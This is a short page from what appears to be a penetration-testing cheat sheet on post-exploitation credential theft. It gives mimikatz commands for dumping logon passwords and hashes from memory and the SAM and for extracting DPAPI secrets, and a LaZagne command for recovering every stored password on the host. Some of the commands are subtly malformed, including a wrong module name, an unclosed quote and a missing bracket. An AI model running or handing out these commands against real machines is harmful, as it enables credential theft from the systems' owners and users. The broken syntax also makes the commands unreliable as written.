Post-Exploitation

Dump hashes with mimikatz

From memory

.\mimikatz.exe "sekurlsa::logonpasswords" exit

From SAM

.\mimikatz.exe "sekurlsa::sam /sam:<path_to_sam /system:<path_to_system> exit

LaZagne

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer.

LogoGitHub - AlessandroZ/LaZagne: Credentials recovery projectGitHub
.\LaZagne.exe all

dpapi extract with mimikatz

.\mimikatz.exe "sekurlsa:dpapi" exit
PreviousPrivilege EscalationNextCross-domain enumeration

Last updated